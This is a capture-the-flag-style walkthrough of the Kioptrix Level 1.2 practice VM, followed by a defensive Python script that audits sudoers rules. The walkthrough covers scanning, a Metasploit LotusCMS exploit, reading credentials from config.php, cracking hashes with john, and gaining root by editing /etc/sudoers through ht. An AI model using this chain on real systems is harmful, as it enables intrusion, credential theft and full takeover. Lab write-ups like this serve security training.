
Kioptrix Level 1.2 (#3) Walkthrough

Enumeration

nmap

Start scanning the machine using nmap commands:

nmap -sC -sV -oA nmap/Level1.2 192.168.43.176
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-08 09:21 EDT
Nmap scan report for 192.168.43.176
Host is up (0.0046s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey: 
|   1024 30:e3:f6:dc:2e:22:5d:17:ac:46:02:39:ad:71:cb:49 (DSA)
|_  2048 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd (RSA)
80/tcp open  http    Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Ligoat Security - Got Goat? Security ...
MAC Address: 00:0C:29:72:68:BE (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.50 seconds

Then, seeing that port 80 is open, let's put the IP in the browser and see what we get.

Dirb

dirb http://192.168.43.176

Got this output, and gallery and phpmyadmin caught my eye!

First we navigate to phpmyadmin and get a login form.

I managed to log in with the username administrator, but nothing interesting popped up.

I navigate back to the login form to see what I can do from here.

Exploit

Tried SQL injection but had no luck; then I saw the login form is powered by LotusCMS and decided to use searchsploit to see what exploit we can find.

Found it! Next, we can use msfconsole to run the exploit.

Type use exploit/multi/http/lcms_php_exec, then type show options

then type set RHOST 192.168.43.176 to set the remote host IP

then type set URI / to set the URI option to /

then type run or exploit

Then type shell to get a shell from the meterpreter.

Then, we will get a proper shell by typing /bin/bash -i

Then, we need to locate a file called config.php

After cat'ing the file we got a lot of code, and I managed to spot the login credentials for the phpmyadmin login form.

After that, navigate to the gallery database and open the dev_account table, where we find two users' usernames and hashed passwords.

Put the hashes in a text file and type john --wordlist=/usr/share/wordlists/rockyou.txt --format=RAW-MD5 hash.txt

Then we get the passwords for both users:

dreg:mast3r

loneferret:starwars

Privilege Escalation

Then we log in as both users over ssh. I can't find anything interesting as the dreg user, so maybe loneferret is the one we want.

After logging into the account, we cat the CompanyPolicy.README file and get this

When we type sudo ht, we get this

Then I typed which ht and ls -l /usr/local/bin/ht, and we know it is owned by root and can be exploited through SUID rights.

Then we can type export TERM=xterm so ht can draw its interface

then run sudo ht, press F3 and navigate to /etc/sudoers

change the loneferret line to loneferret ALL=NOPASSWD: ALL

Then, press F2 to save and F10 to quit

Type sudo su and you will get root

Or you can append /bin/bash to the end of the loneferret line

Then type sudo /bin/bash and you will get root!
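As an added defender-side example (not part of the original walkthrough), here is a small Python audit of sudoers-style rules that flags exactly what this escalation relies on: a NOPASSWD grant and a permitted command that is an editor, pager or shell. The sample rules and the RISKY_BINARIES list are constructed for illustration, not taken from the VM.

```python
import os
import re

# Binaries that, when runnable as root through sudo, let the caller open and
# write any file (editors and pagers with shell escapes) or start a shell.
# ht is the editor this box grants; a sudo rule for it is as strong as ALL.
RISKY_BINARIES = {"ht", "vi", "vim", "nano", "less", "more", "sh", "bash", "su"}
SKIP_PREFIXES = ("Defaults", "User_Alias", "Host_Alias", "Cmnd_Alias", "Runas_Alias")
TAG_RE = re.compile(r"\b(NOPASSWD|PASSWD|NOEXEC|EXEC|SETENV|NOSETENV)\s*:")


def parse_rule(line):
    """Parse one user-spec line; None for blanks, comments, Defaults, aliases."""
    line = line.split("#", 1)[0].strip()
    if not line or line.startswith(SKIP_PREFIXES):
        return None
    who, _, spec = line.partition("=")
    user = who.split()[0]
    spec = re.sub(r"^\s*\([^)]*\)", "", spec)  # drop the (runas) list
    tags = set(TAG_RE.findall(spec))
    commands = [c.strip() for c in TAG_RE.sub("", spec).split(",") if c.strip()]
    return user, tags, commands


def audit_sudoers(text):
    """Return (user, finding) pairs for rules a reviewer should question."""
    findings = []
    for line in text.splitlines():
        parsed = parse_rule(line)
        if parsed is None:
            continue
        user, tags, commands = parsed
        if "NOPASSWD" in tags:
            findings.append((user, "NOPASSWD: root commands run without authentication"))
        for cmd in commands:
            if cmd.startswith("!"):
                continue  # a negated entry does not restrict the entries beside it
            name = os.path.basename(cmd.split()[0])
            if name in RISKY_BINARIES:
                findings.append((user, f"{cmd} can edit any file or spawn a shell as root"))
    return findings


# Constructed sample for demonstration, not the VM's actual /etc/sudoers.
SAMPLE = """\
root        ALL=(ALL) ALL
%admin      ALL=(ALL) ALL
loneferret  ALL=NOPASSWD: !/usr/bin/su, /usr/local/bin/ht
dreg        ALL=(ALL) /usr/bin/apt-get
"""
```

Running audit_sudoers(SAMPLE) reports only the loneferret rule, once for NOPASSWD and once for the ht grant; the !/usr/bin/su negation is correctly ignored because it does not limit the other permitted command.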

Congratulations!
